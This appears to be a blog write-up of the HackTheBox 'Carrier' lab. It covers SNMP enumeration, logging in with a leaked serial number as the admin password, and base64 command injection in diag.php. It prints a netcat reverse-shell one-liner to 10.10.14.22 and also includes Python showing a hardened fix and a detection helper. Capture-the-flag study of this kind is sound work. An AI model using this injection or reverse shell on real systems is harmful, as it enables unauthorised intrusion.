
hackthebox carrier medium

Posted: 2024-03-24 17:56:19 Views: 25
Tags: Status forever medium hackthebox 00 lft carrier ff 10.10

Recon

NMAP SCAN

nmap -sT -p- --min-rate 1000 -oA nmap/ports 10.10.10.105
22/tcp open ssh
80/tcp open http
nmap -sT -pxx,xx -sV -oA nmap/version 10.10.10.105
nmap -sU -p- --min-rate 1000 -oA nmap/udp 10.10.10.105
161/udp open snmp
nmap -sU -pxx -sV -oA nmap/udpscanversion 10.10.10.105
161/udp open snmp SNMPv1 server: pysnmp SNMPv3 server (public)

SNMP Information Collection

Go to HackTricks and find the SNMP enumeration notes.

Enumerate SNMP

└─$ snmpwalk -c public -v2c 10.10.10.105
iso.3.6.1.2.1.47.1.1.1.1.11 = STRING: "SN#NET_45JDX23"
iso.3.6.1.2.1.47.1.1.1.1.11 = No more variables left in this MIB View (It is past the end of the MIB tree)

Here we notice that the output contains an unknown string, "SN#NET_45JDX23".

Shell as root

Website 80 exploit


index.php is a login page, and we need to get into the backend.

At first I tried SQL injection and weak passwords, but both failed.

Directory brute force

gobuster dir -u http://10.10.10.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-.txt
/img (Status: 301)
/doc (Status: 301)
/index.php (Status: 200)
/tools (Status: 301)
/css (Status: 301)
/js (Status: 301)
/tickets.php (Status: 302)
/fonts (Status: 301)
/dashboard.php (Status: 302)
/debug (Status: 301)
/diag.php (Status: 302)
/server-status (Status: 403) 

We check the directories above one by one.

At /doc we find a directory index.

Look at error_codes.pdf.

The PDF explains the error codes.

The main page shows two error codes, 45007 and 45009.

According to the explanation of error 45009, there is an admin user account whose password is the chassis serial number.

In the SNMP output collected earlier there is a serial-number string, "NET_45JDX23".

Using admin/NET_45JDX23 we log in to the backend.

Shell as root

Looking for interaction points, we find a "Verify status" button.

In Burp, clicking the button generates a POST request.

POST /diag.php HTTP/1.1
Host: 10.10.10.105
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
Origin: http://10.10.10.105
Connection: close
Referer: http://10.10.10.105/diag.php
Cookie: PHPSESSID=najc6dbvucoqec8bf6kaa70an6
Upgrade-Insecure-Requests: 1

check=cXVhZ2dh

I notice that the value passed to check is base64 encoded and decodes to quagga, which happens to be the string that appears in each of the response lines above.

I send it to Repeater and change check to 'cm9vdA==', the base64 encoding of 'root'. The response lists the root processes running on the host.

RCE

I hypothesize that this endpoint executes a command, something like 'ps aux | grep $(echo $_POST[check] | base64 -d)'.

So the decoded value ends up in a Linux bash shell. I can append a semicolon and have bash run the command that follows it.

Replacing the value of the check parameter and sending the request, we receive a reverse shell.
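The root cause hypothesised above is a base64-decoded request parameter spliced unquoted into a shell command line. The following Python is an added illustration, not code from the box or from diag.php (whose real source is not shown in this write-up): it models the vulnerable string-building pattern next to a hardened version that validates the decoded value against an allowlist and passes it as a single argv element with no shell, plus a small detection helper a defender could run over request logs. The process-name allowlist, the use of pgrep, and the sample injected value are assumptions made for the example.

```python
import base64
import binascii
import re
from typing import List

# Allowlist for the decoded "check" value: a bare process name and nothing else.
# (Assumption: the diagnostics page only ever needs to look up a process by name.)
PROCESS_NAME = re.compile(r"^[A-Za-z0-9_.-]{1,64}$")

# Shell metacharacters and whitespace that have no business in a process name.
SHELL_META = re.compile(r"[;&|`$()<>{}\[\]\s]")

# Constructed sample: a value that would break out of the grep argument.
SAMPLE_INJECTED = base64.b64encode(b"root;id").decode()


def decode_check(value: str) -> str:
    """Decode the base64 'check' parameter, rejecting malformed input."""
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError) as exc:
        raise ValueError("check is not valid base64") from exc
    try:
        return raw.decode("ascii")
    except UnicodeDecodeError as exc:
        raise ValueError("check is not printable ASCII") from exc


def vulnerable_command(check: str) -> str:
    """The shell string the write-up hypothesises diag.php builds.

    The decoded value is interpolated unquoted into a shell line, so a ';'
    inside it terminates grep and starts a second command. This function only
    builds the string; it never executes it.
    """
    return f"ps aux | grep {decode_check(check)}"


def hardened_argv(check: str) -> List[str]:
    """Hardened form: validate the decoded value, then pass it as one argv
    element to be executed without a shell (e.g. subprocess.run(argv)),
    so metacharacters are inert even if validation were ever loosened."""
    name = decode_check(check)
    if not PROCESS_NAME.fullmatch(name):
        raise ValueError(f"rejected process name: {name!r}")
    # '--' stops pgrep from treating a leading '-' in the name as an option.
    return ["pgrep", "-a", "--", name]


def is_suspicious(check: str) -> bool:
    """Detection helper for access-log review: flag values that fail to
    decode or whose decoded form carries shell metacharacters."""
    try:
        name = decode_check(check)
    except ValueError:
        return True
    return bool(SHELL_META.search(name))


if __name__ == "__main__":
    for value in ("cXVhZ2dh", "cm9vdA==", SAMPLE_INJECTED):
        print(value, "->", repr(decode_check(value)),
              "suspicious" if is_suspicious(value) else "clean")
```

The hardened version relies on two independent controls: the allowlist rejects anything that is not a plain process name, and the argv form removes the shell from the picture entirely, so neither a missed regex edge case nor a future change to the allowlist turns back into command execution.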

FULL shell

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.22 9999 > /tmp/f

Enumeration

At first I rummage through the sensitive directories and the web root, but I don't find anything useful.

Network Enum

Local IPS

root@r1:~# ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
8: eth0@if9: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:3e:d9:04:ea brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.99.64.2/24 brd 10.99.64.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fed9:4ea/64 scope link 
       valid_lft forever preferred_lft forever
10: eth1@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:3e:8a:f2:4f brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.78.10.1/24 brd 10.78.10.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe8a:f24f/64 scope link 
       valid_lft forever preferred_lft forever
12: eth2@if13: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:3e:20:98:df brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 10.78.11.1/24 brd 10.78.11.255 scope global eth2
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe20:98df/64 scope link 
       valid_lft forever preferred_lft forever

From: https://www.cnblogs.com/lisenMiller/p/18089924
